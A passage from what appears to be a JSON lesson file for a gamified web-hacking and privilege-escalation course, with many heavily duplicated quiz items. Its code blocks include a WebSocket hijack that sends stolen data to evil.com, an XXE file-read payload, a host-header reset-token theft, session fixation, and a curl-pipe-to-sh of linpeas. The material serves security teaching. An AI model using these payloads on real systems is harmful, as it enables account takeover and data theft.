payload."},{"type":"quiz","q":"CSP JSONP bypass works when...","opts":["CSP is disabled","A whitelisted domain has a JSONP endpoint","CSP uses nonces","CSP blocks everything"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-websocket-xss","cat":"Web Application","title":"WebSocket-Based Attacks","diff":3,"xp":200,"intro":"Exploit WebSocket connections for XSS and data theft.","sections":[{"type":"text","content":"WebSockets don't enforce same-origin by default. Cross-site WebSocket hijacking lets any page connect to the victim's WebSocket and steal messages."},{"type":"code","lang":"javascript","content":"// Cross-site WebSocket hijacking\nvar ws = new WebSocket('wss://target.com/ws');\nws.onmessage = function(e) {\n  fetch('https://evil.com/steal?d='+btoa(e.data));\n};"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"WebSocket hijacking works because...","opts":["WebSockets are encrypted","WebSockets don't enforce same-origin by default","WebSockets use HTTP","WebSockets require auth"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-xxe-basic","cat":"Web Application","title":"XXE Injection Basics","diff":2,"xp":150,"intro":"Read files via XML entity expansion.","sections":[{"type":"text","content":"If an app parses XML with external entities enabled, inject a DTD that reads local files."},{"type":"code","lang":"xml","content":"<?xml version='1.0'?>\n<!DOCTYPE foo [\n  <!ENTITY xxe SYSTEM 'file:///etc/passwd'>\n]>\n<root>&xxe;</root>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"XXE requires the parser to...","opts":["Use JSON","Process external entities","Support XPath","Use XSLT"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-cache-deception","cat":"Web Application","title":"Web Cache Deception","diff":3,"xp":200,"intro":"Trick the cache into storing authenticated content.","sections":[{"type":"text","content":"If the cache keys on path but the app ignores non-existent path suffixes, request /profile/image.css \u2014 the app serves the profile, the cache stores it as a static file anyone can access."},{"type":"code","lang":"bash","content":"# Trick: add a static-looking extension\nhttps://target.com/account/settings/anything.css\n# If cache stores it and app returns the account page:\n# Anyone requesting that URL gets the cached authenticated content"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Cache deception works when...","opts":["The cache is disabled","The cache keys on path extension but the app ignores the suffix","The app validates paths","CSP is enabled"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-password-reset","cat":"Web Application","title":"Password Reset Vulnerabilities","diff":2,"xp":150,"intro":"Exploit flaws in password reset flows.","sections":[{"type":"text","content":"Common bugs: token sent in URL (leaks via Referer), predictable tokens, no expiration, host header injection in reset links, token not invalidated after use."},{"type":"code","lang":"bash","content":"# Host header injection in reset\nPOST /forgot-password HTTP/1.1\nHost: evil.com\nContent-Type: application/x-www-form-urlencoded\n\nemail=victim@target.com\n# Reset email contains: https://evil.com/reset?token=SECRET"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Host header in password reset is dangerous because...","opts":["It changes DNS","The reset link uses the attacker's domain to steal the token","It encrypts the token","It invalidates the token"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-session-fixation","cat":"Web Application","title":"Session Fixation Attack","diff":2,"xp":150,"intro":"Force a user to use a session ID you already know.","sections":[{"type":"text","content":"Set a session cookie before the victim logs in. After they authenticate, you share the same authenticated session."},{"type":"code","lang":"bash","content":"# Set a known session ID via URL or XSS\nhttps://target.com/login?SESSIONID=ATTACKER_KNOWN_ID\n# Or inject via XSS:\ndocument.cookie='SESSIONID=ATTACKER_KNOWN_ID'\n# Victim logs in -> the known session is now authenticated\n# Attacker uses the same session ID to access the account"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Session fixation works because...","opts":["Sessions are encrypted","The app doesn't regenerate the session ID after login","The session expires","The token is random"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"pe-automated-enum","cat":"Privilege Escalation","title":"Automated Privilege Escalation Enumeration","diff":1,"xp":75,"intro":"Run automated scripts to find privesc vectors.","sections":[{"type":"text","content":"LinPEAS/WinPEAS enumerate everything: SUID, capabilities, writable files, services, cron, credentials, sudo, kernel version \u2014 in one run."},{"type":"code","lang":"bash","content":"# Linux\ncurl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh\n# Windows\n.winPEASany.exe"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Automated enumeration saves time because...","opts":["It exploits vulnerabilities","It checks hundreds of privesc vectors at once","It cracks passwords","It scans the network"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-env-vars","cat":"Privilege Escalation","title":"Environment Variable Exploitation","diff":2,"xp":150,"intro":"Sensitive data leaks through environment variables.","sections":[{"type":"text","content":"Environment variables may contain: API keys, database credentials, AWS keys, paths to config files, and debug flags."},{"type":"code","lang":"bash","content":"env\nprintenv\ncat /proc/self/environ | tr '0' '\\n'\nset  # in Windows cmd"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Environment variables leak...","opts":["Nothing useful","API keys, database creds, and cloud credentials","Network topology","File permissions"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit 